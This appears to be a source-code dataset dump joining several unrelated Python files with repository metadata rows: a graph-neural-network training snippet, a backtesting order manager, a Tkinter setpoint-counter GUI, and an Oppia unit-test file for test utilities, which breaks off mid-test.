splits = data.split_nodes(random_state=15)
graphgallery.set_backend("pytorch")
from graphgallery.gallery.nodeclas import TrimmedGCN
trainer = TrimmedGCN(device="gpu", seed=123).setup_graph(graph).build()
trainer.fit(splits.train_nodes, splits.val_nodes, verbose=1, epochs=100)
results = trainer.evaluate(splits.test_nodes)
print(f'Test loss {results.loss:.5}, Test accuracy {results.accuracy:.2%}')
| true | true |
f722fdd93e7acefd5b4367b293047080207962d1 | 1,255 | py | Python | tmtrader/exchange_for_backtest/order_manager.py | reouno/tomatorader | b781206051129fa59439a0f314f4f1ed647a6852 | [
"MIT"
] | null | null | null | tmtrader/exchange_for_backtest/order_manager.py | reouno/tomatorader | b781206051129fa59439a0f314f4f1ed647a6852 | [
"MIT"
] | null | null | null | tmtrader/exchange_for_backtest/order_manager.py | reouno/tomatorader | b781206051129fa59439a0f314f4f1ed647a6852 | [
"MIT"
] | null | null | null | from typing import List
from tmtrader.entity.order import BasicOrder, FilledBasicOrder
from tmtrader.entity.trade import Trade
class OrderManager:
    """Book-keeping container for orders and trades during a backtest run.

    Orders move through four append-only buckets: open, filled, cancelled,
    and the trades produced by fills. Each bucket is exposed read-only via a
    property and grown in bulk via the matching ``add_*`` method.
    """

    def __init__(self):
        self.__open_orders: List[BasicOrder] = []
        self.__filled_orders: List[FilledBasicOrder] = []
        # TODO: refactor and define ClosedOrder and CancelledOrder
        self.__cancelled_orders: List[BasicOrder] = []
        self.__trades: List[Trade] = []

    @property
    def open_orders(self) -> List[BasicOrder]:
        """Orders placed but not yet filled or cancelled."""
        return self.__open_orders

    def add_open_orders(self, orders: List[BasicOrder]):
        self.__open_orders.extend(orders)

    @property
    def filled_orders(self) -> List[FilledBasicOrder]:
        """Orders that have been executed."""
        return self.__filled_orders

    def add_filled_orders(self, orders: List[FilledBasicOrder]):
        self.__filled_orders.extend(orders)

    @property
    def cancelled_orders(self) -> List[BasicOrder]:
        """Orders withdrawn before execution."""
        return self.__cancelled_orders

    def add_cancelled_orders(self, orders: List[BasicOrder]):
        self.__cancelled_orders.extend(orders)

    @property
    def trades(self) -> List[Trade]:
        """Completed trades produced by fills."""
        return self.__trades

    def add_trades(self, trades: List[Trade]):
        self.__trades.extend(trades)
| 29.186047 | 66 | 0.700398 | from typing import List
from tmtrader.entity.order import BasicOrder, FilledBasicOrder
from tmtrader.entity.trade import Trade
class OrderManager:
def __init__(self):
self.__open_orders: List[BasicOrder] = list()
self.__filled_orders: List[FilledBasicOrder] = list()
self.__cancelled_orders: List[BasicOrder] = list()
self.__trades: List[Trade] = list()
@property
def open_orders(self) -> List[BasicOrder]:
return self.__open_orders
@property
def filled_orders(self) -> List[FilledBasicOrder]:
return self.__filled_orders
@property
def cancelled_orders(self) -> List[BasicOrder]:
return self.__cancelled_orders
@property
def trades(self) -> List[Trade]:
return self.__trades
def add_open_orders(self, orders: List[BasicOrder]):
self.__open_orders.extend(orders)
def add_filled_orders(self, orders: List[FilledBasicOrder]):
self.__filled_orders.extend(orders)
def add_cancelled_orders(self, orders: List[BasicOrder]):
self.__cancelled_orders.extend(orders)
def add_trades(self, trades: List[Trade]):
self.__trades.extend(trades)
| true | true |
f722fdf903135f2143fb5c022bd33aa1336afbd0 | 2,464 | py | Python | _Tkinter/Tkinter_Count.py | meigrafd/Sample-Code | 7065950dfd0728cfad66db08327f0efa4c26999c | [
"MIT"
] | 10 | 2017-02-08T18:36:09.000Z | 2021-03-31T04:22:25.000Z | _Tkinter/Tkinter_Count.py | meigrafd/Sample-Code | 7065950dfd0728cfad66db08327f0efa4c26999c | [
"MIT"
] | 2 | 2017-01-30T22:15:43.000Z | 2017-09-01T21:49:29.000Z | _Tkinter/Tkinter_Count.py | meigrafd/Sample-Code | 7065950dfd0728cfad66db08327f0efa4c26999c | [
"MIT"
] | 8 | 2017-02-09T12:33:47.000Z | 2021-04-03T13:34:33.000Z | #!/usr/bin/python3
# coding: utf-8
from tkinter import *
BGCOLOR="#229"
def Hochzaehlen(event=None):
    """Increment the target value (Sollwert) by one; usable as an event handler."""
    current = sollwert.get()
    sollwert.set(current + 1)
def Runterzaehlen(event=None):
    """Decrement the target value (Sollwert) by one; usable as an event handler."""
    current = sollwert.get()
    sollwert.set(current - 1)
def Bestaetigen():
    """Confirm the current target value and display it in the confirmation label."""
    confirm_label.config(text="Eingestellter Sollwert " + str(sollwert.get()))
    # Mark the value as confirmed so Starten() is allowed to run.
    confirmed.set(True)
def Starten():
    """Begin the sensor polling loop, but only after the target was confirmed."""
    if not confirmed.get():
        return
    read_sensor_data(istwert_label)
def read_sensor_data(label):
    """One polling tick: bump the actual value (Istwert) and reschedule.

    Stops and resets once the actual value reaches the confirmed target.
    """
    istwert.set(istwert.get() + 1)
    if istwert.get() != sollwert.get():
        # Schedule the next tick in one second via the Tk event loop.
        label.after(1000, read_sensor_data, label)
    else:
        # Target reached: require a fresh confirmation and reset the counter.
        confirmed.set(False)
        istwert.set(0)
# Main Window: Fullscreen
# (Fixed: the final mainloop() line was corrupted by extraction residue
# appended to it.)
window = Tk()
w = window.winfo_screenwidth()
h = window.winfo_screenheight()
# Size the window to the full screen, anchored at the top-left corner.
window.geometry(str(w) +"x"+ str(h) +"+0+0")
window.configure(background=BGCOLOR)
#window["bg"] = BGCOLOR
# Shared Tk variables read/written by the handler functions above.
istwert = IntVar()
sollwert = IntVar()
confirmed = BooleanVar()
confirmed.set(False)
solltext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Sollwert")
sollwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=sollwert)
isttext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Istwert")
istwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=istwert)
confirm_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Eingestellter Sollwert 0")
up_button = Button(master=window, bg=BGCOLOR, fg="white", text="Hochzaehlen", command=Hochzaehlen)
down_button = Button(master=window, bg=BGCOLOR, fg="white", text="Runterzaehlen", command=Runterzaehlen)
confirm_button = Button(master=window, bg=BGCOLOR, fg="white", text="Bestaetigen", command=Bestaetigen)
start_button = Button(master=window, bg=BGCOLOR, fg="white", text="Start", command=Starten)
exit_button = Button(master=window, bg=BGCOLOR, fg="white", text="X", command=window.destroy)
# Row 0: controls; row 1: confirmation text; row 2: actual value; row 4: exit.
solltext_label.grid(row=0, column=0)
sollwert_label.grid(row=0, column=1)
up_button.grid(row=0, column=2)
down_button.grid(row=0, column=3)
confirm_button.grid(row=0, column=4)
start_button.grid(row=0, column=5)
confirm_label.grid(row=1, column=2)
isttext_label.grid(row=2, column=0)
istwert_label.grid(row=2, column=1)
exit_button.grid(row=4, column=5)
# Let column/row 1 absorb extra space when the grid stretches.
window.grid_columnconfigure(1, weight=1)
window.grid_rowconfigure(1, weight=1)
window.mainloop()
from tkinter import *
BGCOLOR="#229"
def Hochzaehlen(event=None):
sollwert.set(sollwert.get() + 1)
def Runterzaehlen(event=None):
sollwert.set(sollwert.get() - 1)
def Bestaetigen():
bestaetigen = "Eingestellter Sollwert " + str(sollwert.get())
confirm_label.config(text=bestaetigen)
confirmed.set(True)
def Starten():
if confirmed.get() == True:
read_sensor_data(istwert_label)
def read_sensor_data(label):
istwert.set(istwert.get() + 1)
if istwert.get() == sollwert.get():
confirmed.set(False)
istwert.set(0)
else:
label.after(1000, read_sensor_data, label)
window = Tk()
w = window.winfo_screenwidth()
h = window.winfo_screenheight()
window.geometry(str(w) +"x"+ str(h) +"+0+0")
window.configure(background=BGCOLOR)
istwert = IntVar()
sollwert = IntVar()
confirmed = BooleanVar()
confirmed.set(False)
solltext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Sollwert")
sollwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=sollwert)
isttext_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Istwert")
istwert_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", textvariable=istwert)
confirm_label = Label(master=window, bg=BGCOLOR, font=("Courier", 25), fg="white", text="Eingestellter Sollwert 0")
up_button = Button(master=window, bg=BGCOLOR, fg="white", text="Hochzaehlen", command=Hochzaehlen)
down_button = Button(master=window, bg=BGCOLOR, fg="white", text="Runterzaehlen", command=Runterzaehlen)
confirm_button = Button(master=window, bg=BGCOLOR, fg="white", text="Bestaetigen", command=Bestaetigen)
start_button = Button(master=window, bg=BGCOLOR, fg="white", text="Start", command=Starten)
exit_button = Button(master=window, bg=BGCOLOR, fg="white", text="X", command=window.destroy)
solltext_label.grid(row=0, column=0)
sollwert_label.grid(row=0, column=1)
up_button.grid(row=0, column=2)
down_button.grid(row=0, column=3)
confirm_button.grid(row=0, column=4)
start_button.grid(row=0, column=5)
confirm_label.grid(row=1, column=2)
isttext_label.grid(row=2, column=0)
istwert_label.grid(row=2, column=1)
exit_button.grid(row=4, column=5)
window.grid_columnconfigure(1, weight=1)
window.grid_rowconfigure(1, weight=1)
window.mainloop() | true | true |
f722fe1c14cd8415ba73037f18d4be1f4ad2e409 | 26,156 | py | Python | core/tests/test_utils_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | 1 | 2021-08-17T20:33:12.000Z | 2021-08-17T20:33:12.000Z | core/tests/test_utils_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | null | null | null | core/tests/test_utils_test.py | WebFlakyTest/oppia | 520e35490eae8171beb035fbafc2948983abec75 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS-IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for test_utils, mainly for the FunctionWrapper."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import logging
import os
import re
from constants import constants
from core import jobs
from core.domain import auth_domain
from core.domain import param_domain
from core.domain import taskqueue_services
from core.platform import models
from core.tests import test_utils
import python_utils
import mock
import webapp2
# Resolve the exploration storage models and the email service through the
# platform models Registry.
exp_models, = models.Registry.import_models([models.NAMES.exploration])
email_services = models.Registry.import_email_services()
class FunctionWrapperTests(test_utils.GenericTestBase):
    """Test for testing test_utils.FunctionWrapper."""
    def test_wrapper_calls_subclass_methods(self):
        """Tests the basic functionality of FunctionWrapper."""
        # Keeps track of which functions have been called, to test that
        # pre_call_hook, the actual function, and post_call_hook are
        # called in the right order.
        order = []
        testcase = self
        class MockWrapper(test_utils.FunctionWrapper):
            def pre_call_hook(self, args):
                """Mock pre call hook.
                Args:
                    args: dict. Maps the wrapped function's parameter names
                        to the values it was called with.
                Raises:
                    AssertionError. The arguments do not match the values
                        used in the test call below.
                """
                order.append('before')
                testcase.assertEqual(args.get('posarg'), 'foo')
                testcase.assertEqual(args.get('kwarg'), 'bar')
            def post_call_hook(self, args, result):
                """Mock post call hook.
                Args:
                    args: dict. Maps the wrapped function's parameter names
                        to the values it was called with.
                    result: str. The value returned by the wrapped function.
                Raises:
                    AssertionError. The arguments or result do not match the
                        values used in the test call below.
                """
                order.append('after')
                testcase.assertEqual(result, 'foobar')
                testcase.assertEqual(args.get('posarg'), 'foo')
                testcase.assertEqual(args.get('kwarg'), 'bar')
        def mock_function(posarg, kwarg):
            order.append('call')
            return posarg + kwarg
        wrapped = MockWrapper(mock_function)
        # A single call must run pre_call_hook, the function, post_call_hook.
        self.assertEqual(wrapped('foo', kwarg='bar'), 'foobar')
        self.assertEqual(order, ['before', 'call', 'after'])
    def test_wrapper_calls_passed_method(self):
        """Tests that FunctionWrapper also works for methods."""
        # 'data' captures the side effect of mock_method so the test can
        # verify that the original body actually ran under the wrapper.
        data = {}
        class MockClass(python_utils.OBJECT):
            def __init__(self, num1):
                self.num1 = num1
            def mock_method(self, num2):
                data['value'] = self.num1 + num2
                return (self.num1 + num2) * 2
        wrapped = test_utils.FunctionWrapper(MockClass.mock_method)
        with self.swap(MockClass, 'mock_method', wrapped):
            val = MockClass('foo').mock_method('bar')
            self.assertEqual(val, 'foobarfoobar')
            self.assertEqual(data.get('value'), 'foobar')
    def test_wrapper_calls_passed_class_method(self):
        """Tests that FunctionWrapper also works for class methods."""
        data = {}
        class MockClass(python_utils.OBJECT):
            str_attr = 'foo'
            @classmethod
            def mock_classmethod(cls, num):
                data['value'] = cls.str_attr + num
                return (cls.str_attr + num) * 2
        wrapped = test_utils.FunctionWrapper(MockClass.mock_classmethod)
        with self.swap(MockClass, 'mock_classmethod', wrapped):
            val = MockClass.mock_classmethod('bar')
            self.assertEqual(val, 'foobarfoobar')
            self.assertEqual(data.get('value'), 'foobar')
    def test_wrapper_calls_passed_static_method(self):
        """Tests that FunctionWrapper also works for static methods."""
        data = {}
        class MockClass(python_utils.OBJECT):
            @staticmethod
            def mock_staticmethod(num):
                data['value'] = num
                return num * 2
        wrapped = test_utils.FunctionWrapper(MockClass.mock_staticmethod)
        with self.swap(MockClass, 'mock_staticmethod', wrapped):
            val = MockClass.mock_staticmethod('foobar')
            self.assertEqual(val, 'foobarfoobar')
            self.assertEqual(data.get('value'), 'foobar')
    def test_wrapper_calls_passed_lambdas(self):
        """Tests that FunctionWrapper also works for lambdas."""
        data = {}
        def mock_function_with_side_effect(num):
            data['value'] = num
            return num
        mock_lambda = lambda x: mock_function_with_side_effect(x) * 2
        wrapped = test_utils.FunctionWrapper(mock_lambda)
        self.assertEqual(wrapped('foobar'), 'foobarfoobar')
        self.assertEqual(data.get('value'), 'foobar')
    def test_pre_call_hook_does_nothing(self):
        """Tests that the base class's pre_call_hook is a no-op."""
        function = lambda x: x ** 2
        wrapped = test_utils.FunctionWrapper(function)
        self.assertIsNone(wrapped.pre_call_hook('args'))
class AuthServicesStubTests(test_utils.GenericTestBase):
    """Tests for the test_utils.AuthServicesStub auth-association stub."""
    # Email used for the non-admin login in the claims test below.
    EMAIL = 'user@test.com'
    def setUp(self):
        """Installs a fresh AuthServicesStub for each test."""
        super(AuthServicesStubTests, self).setUp()
        self.stub = test_utils.AuthServicesStub()
    def test_get_auth_claims_from_request(self):
        """Claims are None when logged out, and reflect the login context."""
        request = webapp2.Request.blank('/')
        self.assertIsNone(self.stub.get_auth_claims_from_request(request))
        with self.login_context(self.EMAIL):
            self.assertEqual(
                self.stub.get_auth_claims_from_request(request),
                auth_domain.AuthClaims(
                    self.get_auth_id_from_email(self.EMAIL), self.EMAIL, False))
        with self.super_admin_context():
            self.assertEqual(
                self.stub.get_auth_claims_from_request(request),
                auth_domain.AuthClaims(
                    self.get_auth_id_from_email(self.SUPER_ADMIN_EMAIL),
                    self.SUPER_ADMIN_EMAIL,
                    True))
        # Outside of any login context the claims are gone again.
        self.assertIsNone(self.stub.get_auth_claims_from_request(request))
    def test_get_association_that_is_present(self):
        """An established association is readable in both directions."""
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid', 'uid'))
        self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
        self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
    def test_get_association_that_is_missing(self):
        """Lookups for unknown ids return None rather than raising."""
        self.assertIsNone(self.stub.get_user_id_from_auth_id('does_not_exist'))
        self.assertIsNone(self.stub.get_auth_id_from_user_id('does_not_exist'))
    def test_get_multi_associations_with_all_present(self):
        """Batch lookups preserve input order in both directions."""
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid1', 'uid1'))
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid2', 'uid2'))
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid3', 'uid3'))
        self.assertEqual(
            self.stub.get_multi_user_ids_from_auth_ids(
                ['aid1', 'aid2', 'aid3']),
            ['uid1', 'uid2', 'uid3'])
        self.assertEqual(
            self.stub.get_multi_auth_ids_from_user_ids(
                ['uid1', 'uid2', 'uid3']),
            ['aid1', 'aid2', 'aid3'])
    def test_get_multi_associations_with_one_missing(self):
        """Batch lookups return None placeholders for missing associations."""
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid1', 'uid1'))
        # The aid2 <-> uid2 association is missing.
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid3', 'uid3'))
        self.assertEqual(
            self.stub.get_multi_user_ids_from_auth_ids(
                ['aid1', 'aid2', 'aid3']),
            ['uid1', None, 'uid3'])
        self.assertEqual(
            self.stub.get_multi_auth_ids_from_user_ids(
                ['uid1', 'uid2', 'uid3']),
            ['aid1', None, 'aid3'])
    def test_associate_auth_id_with_user_id_without_collision(self):
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid', 'uid'))
        self.assertEqual(self.stub.get_user_id_from_auth_id('aid'), 'uid')
        self.assertEqual(self.stub.get_auth_id_from_user_id('uid'), 'aid')
    def test_associate_auth_id_with_user_id_with_collision_raises(self):
        """Re-associating an existing pair raises instead of overwriting."""
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid', 'uid'))
        with self.assertRaisesRegexp(Exception, 'already associated'):
            self.stub.associate_auth_id_with_user_id(
                auth_domain.AuthIdUserIdPair('aid', 'uid'))
    def test_associate_multi_auth_ids_with_user_ids_without_collisions(self):
        self.stub.associate_multi_auth_ids_with_user_ids(
            [auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
             auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
             auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
        self.assertEqual(
            [self.stub.get_user_id_from_auth_id('aid1'),
             self.stub.get_user_id_from_auth_id('aid2'),
             self.stub.get_user_id_from_auth_id('aid3')],
            ['uid1', 'uid2', 'uid3'])
    def test_associate_multi_auth_ids_with_user_ids_with_collision_raises(self):
        """A batch containing an already-known pair raises."""
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid1', 'uid1'))
        with self.assertRaisesRegexp(Exception, 'already associated'):
            self.stub.associate_multi_auth_ids_with_user_ids(
                [auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
                 auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
                 auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
    def test_present_association_is_not_considered_to_be_deleted(self):
        # This operation creates the external auth association.
        self.stub.associate_auth_id_with_user_id(
            auth_domain.AuthIdUserIdPair('aid', 'uid'))
        self.assertFalse(
            self.stub.verify_external_auth_associations_are_deleted('uid'))
    def test_missing_association_is_considered_to_be_deleted(self):
        self.assertTrue(self.stub.verify_external_auth_associations_are_deleted(
            'does_not_exist'))
    def test_delete_association_when_it_is_present(self):
        # This operation creates the external auth association.
        self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
            'aid', 'uid'))
        self.assertFalse(
            self.stub.verify_external_auth_associations_are_deleted('uid'))
        self.stub.delete_external_auth_associations('uid')
        self.assertTrue(
            self.stub.verify_external_auth_associations_are_deleted('uid'))
    def test_delete_association_when_it_is_missing_does_not_raise(self):
        # Should not raise.
        self.stub.delete_external_auth_associations('does_not_exist')
class CallCounterTests(test_utils.GenericTestBase):
    """Tests for test_utils.CallCounter."""
    def test_call_counter_counts_the_number_of_times_a_function_gets_called(
            self):
        """times_called starts at zero and increments on every call."""
        square = lambda value: value ** 2
        counted_square = test_utils.CallCounter(square)
        self.assertEqual(counted_square.times_called, 0)
        # Each call must pass through to the wrapped function and bump
        # the counter by exactly one.
        for call_index in python_utils.RANGE(5):
            self.assertEqual(counted_square(call_index), call_index ** 2)
            self.assertEqual(counted_square.times_called, call_index + 1)
class FailingFunctionTests(test_utils.GenericTestBase):
    """Tests for test_utils.FailingFunction."""
    def test_failing_function_never_succeeds_when_n_is_infinity(self):
        """With INFINITY tries, every single call must raise."""
        class MockError(Exception):
            pass
        square = lambda value: value ** 2
        always_failing = test_utils.FailingFunction(
            square, MockError('Dummy Exception'),
            test_utils.FailingFunction.INFINITY)
        for attempt in python_utils.RANGE(20):
            with self.assertRaisesRegexp(MockError, 'Dummy Exception'):
                always_failing(attempt)
    def test_failing_function_raises_error_with_invalid_num_tries(self):
        """A negative num_tries_before_success is rejected on construction."""
        class MockError(Exception):
            pass
        square = lambda value: value ** 2
        with self.assertRaisesRegexp(
            ValueError,
            'num_tries_before_success should either be an integer greater than '
            'or equal to 0, or FailingFunction.INFINITY'):
            test_utils.FailingFunction(square, MockError, -1)
class FailingMapReduceJobManager(jobs.BaseMapReduceJobManager):
    """Test job that fails because map is a classmethod."""
    @classmethod
    def entity_classes_to_map_over(cls):
        # No entities are needed: the failure under test comes from map()
        # itself, not from the mapped data.
        return []
    @classmethod
    def map(cls):
        # Deliberately declared as a classmethod taking no item argument;
        # TestUtilsTests.test_failing_job relies on this making the
        # MapReduce task fail. Do not "fix" this.
        pass
class TestUtilsTests(test_utils.GenericTestBase):
    """Tests for the helper utilities provided by GenericTestBase."""
    def test_failing_job(self):
        """The deliberately-broken MapReduce job surfaces a RuntimeError."""
        self.assertIsNone(FailingMapReduceJobManager.map())
        job_id = FailingMapReduceJobManager.create_new()
        FailingMapReduceJobManager.enqueue(
            job_id, taskqueue_services.QUEUE_NAME_DEFAULT)
        self.assertEqual(
            self.count_jobs_in_mapreduce_taskqueue(None), 1)
        self.assertRaisesRegexp(
            RuntimeError, 'MapReduce task failed: Task<.*>',
            self.process_and_flush_pending_mapreduce_tasks)
    def test_get_static_asset_url(self):
        """Static asset URLs are rooted under /assets."""
        asset_url = self.get_static_asset_url('/images/subjects/Lightbulb.svg')
        self.assertEqual(asset_url, '/assets/images/subjects/Lightbulb.svg')
    def test_get_static_asset_filepath_with_prod_mode_on(self):
        """With DEV_MODE off, assets are served from the build directory."""
        with self.swap(constants, 'DEV_MODE', False):
            filepath = self.get_static_asset_filepath()
            self.assertEqual(filepath, 'build')
    def test_cannot_get_updated_param_dict_with_invalid_param_name(self):
        """A param change referring to an unknown spec name raises."""
        param_change_list = [
            param_domain.ParamChange(
                'a', 'Copier', {
                    'value': 'firstValue', 'parse_with_jinja': False
                }
            )
        ]
        exp_param_specs = {
            'b': param_domain.ParamSpec('UnicodeString'),
        }
        with self.assertRaisesRegexp(Exception, 'Parameter a not found'):
            self.get_updated_param_dict(
                {}, param_change_list, exp_param_specs)
    def test_cannot_save_new_linear_exp_with_no_state_name(self):
        """At least one state name is required."""
        with self.assertRaisesRegexp(
            ValueError, 'must provide at least one state name'):
            self.save_new_linear_exp_with_state_names_and_interactions(
                'exp_id', 'owner_id', [], ['interaction_id'])
    def test_cannot_save_new_linear_exp_with_no_interaction_id(self):
        """At least one interaction type is required."""
        with self.assertRaisesRegexp(
            ValueError, 'must provide at least one interaction type'):
            self.save_new_linear_exp_with_state_names_and_interactions(
                'exp_id', 'owner_id', ['state_name'], [])
    def test_cannot_perform_delete_json_with_non_dict_params(self):
        """delete_json validates that params is a dict."""
        with self.assertRaisesRegexp(
            Exception, 'Expected params to be a dict'):
            self.delete_json('random_url', params='invalid_params')
    def test_cannot_get_response_with_non_dict_params(self):
        """get_response_without_checking_for_errors validates params."""
        with self.assertRaisesRegexp(
            Exception, 'Expected params to be a dict'):
            self.get_response_without_checking_for_errors(
                'random_url', [200], params='invalid_params')
    def test_capture_logging(self):
        """capture_logging collects only messages logged inside the block."""
        logging.info('0')
        with self.capture_logging() as logs:
            logging.info('1')
            logging.debug('2')
            # NOTE(review): logging.warn is deprecated; logging.warning is
            # the preferred spelling (behavior is identical).
            logging.warn('3')
            logging.error('4')
            python_utils.PRINT('5')
        logging.info('6')
        self.assertEqual(logs, ['1', '2', '3', '4'])
    def test_capture_logging_with_min_level(self):
        """min_level filters out messages below the given severity."""
        logging.info('0')
        with self.capture_logging(min_level=logging.WARN) as logs:
            logging.info('1')
            logging.debug('2')
            # NOTE(review): logging.warn is deprecated; logging.warning is
            # the preferred spelling (behavior is identical).
            logging.warn('3')
            logging.error('4')
            python_utils.PRINT('5')
        logging.error('6')
        self.assertEqual(logs, ['3', '4'])
    def test_swap_to_always_return_without_value_uses_none(self):
        """Without an explicit value, the swapped function returns None."""
        obj = mock.Mock()
        obj.func = lambda: obj
        self.assertIs(obj.func(), obj)
        with self.swap_to_always_return(obj, 'func'):
            self.assertIsNone(obj.func())
    def test_swap_to_always_return_with_value(self):
        """The swapped function returns the given value unconditionally."""
        obj = mock.Mock()
        obj.func = lambda: 0
        self.assertEqual(obj.func(), 0)
        with self.swap_to_always_return(obj, 'func', value=123):
            self.assertEqual(obj.func(), 123)
    def test_swap_to_always_raise_without_error_uses_empty_exception(self):
        """Without an explicit error, a bare Exception() is raised."""
        obj = mock.Mock()
        obj.func = lambda: None
        self.assertIsNone(obj.func())
        with self.swap_to_always_raise(obj, 'func'):
            try:
                obj.func()
            except Exception as e:
                # Must be exactly Exception (not a subclass) with no message.
                self.assertIs(type(e), Exception)
                self.assertEqual(python_utils.UNICODE(e), '')
            else:
                self.fail(msg='obj.func() did not raise an Exception')
    def test_swap_to_always_raise_with_error(self):
        """The swapped function raises the given error instance."""
        obj = mock.Mock()
        obj.func = lambda: python_utils.divide(1, 0)
        self.assertRaisesRegexp(
            ZeroDivisionError, 'integer division or modulo by zero', obj.func)
        with self.swap_to_always_raise(obj, 'func', error=ValueError('abc')):
            self.assertRaisesRegexp(ValueError, 'abc', obj.func)
    def test_swap_with_check_on_method_called(self):
        """The swap passes when the swapped function is actually called."""
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
        with getcwd_swap:
            SwapWithCheckTestClass.getcwd_function_without_args()
    def test_swap_with_check_on_called_failed(self):
        """The swap fails when the swapped function is never called."""
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
        with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
            with getcwd_swap:
                SwapWithCheckTestClass.empty_function_without_args()
    def test_swap_with_check_on_not_called(self):
        """called=False passes when the swapped function stays uncalled."""
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(
            os, 'getcwd', mock_getcwd, called=False)
        with getcwd_swap:
            SwapWithCheckTestClass.empty_function_without_args()
    def test_swap_with_check_on_not_called_failed(self):
        """The default expectation (called) fails on an uncalled function."""
        def mock_getcwd():
            return
        getcwd_swap = self.swap_with_checks(
            os, 'getcwd', mock_getcwd)
        with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
            with getcwd_swap:
                SwapWithCheckTestClass.empty_function_without_args()
    def test_swap_with_check_on_expected_args(self):
        """expected_args passes when calls match in order and content."""
        def mock_getenv(unused_env):
            return
        def mock_join(*unused_args):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
        join_swap = self.swap_with_checks(
            os.path, 'join', mock_join, expected_args=[('first', 'second')])
        with getenv_swap, join_swap:
            SwapWithCheckTestClass.functions_with_args()
    def test_swap_with_check_on_expected_args_failed_on_run_sequence(self):
        """expected_args is order-sensitive: a swapped order fails."""
        def mock_getenv(unused_env):
            return
        def mock_join(*unused_args):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_args=[('456',), ('123',)])
        join_swap = self.swap_with_checks(
            os.path, 'join', mock_join, expected_args=[('first', 'second')])
        with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
            with getenv_swap, join_swap:
                SwapWithCheckTestClass.functions_with_args()
    def test_swap_with_check_on_expected_args_failed_on_wrong_args_number(self):
        """Expecting more calls than actually happen fails the check."""
        def mock_getenv(unused_env):
            return
        def mock_join(*unused_args):
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
        join_swap = self.swap_with_checks(
            os.path, 'join', mock_join, expected_args=[
                ('first', 'second'), ('third', 'forth')])
        with self.assertRaisesRegexp(AssertionError, r'join'):
            with getenv_swap, join_swap:
                SwapWithCheckTestClass.functions_with_args()
    def test_swap_with_check_on_expected_kwargs(self):
        """expected_kwargs passes when keyword arguments match per call."""
        def mock_getenv(key, default): # pylint: disable=unused-argument
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv,
            expected_args=[('123',), ('678',)],
            expected_kwargs=[{'default': '456'}, {'default': '900'}])
        with getenv_swap:
            SwapWithCheckTestClass.functions_with_kwargs()
    def test_swap_with_check_on_expected_kwargs_failed_on_wrong_numbers(self):
        """Expecting more kwarg-calls than actually happen fails."""
        def mock_getenv(key, default): # pylint: disable=unused-argument
            return
        getenv_swap = self.swap_with_checks(
            os, 'getenv', mock_getenv, expected_kwargs=[
                {'key': '123', 'default': '456'},
                {'key': '678', 'default': '900'},
                {'key': '678', 'default': '900'},
            ])
        with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
            with getenv_swap:
                SwapWithCheckTestClass.functions_with_kwargs()
    def test_swap_with_check_on_capature_exception_raised_by_tested_function(
            self):
        """Exceptions raised inside the swap propagate to the caller."""
        def mock_getcwd():
            raise ValueError('Exception raised from getcwd()')
        getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
        with self.assertRaisesRegexp(
            ValueError, re.escape('Exception raised from getcwd()')
        ):
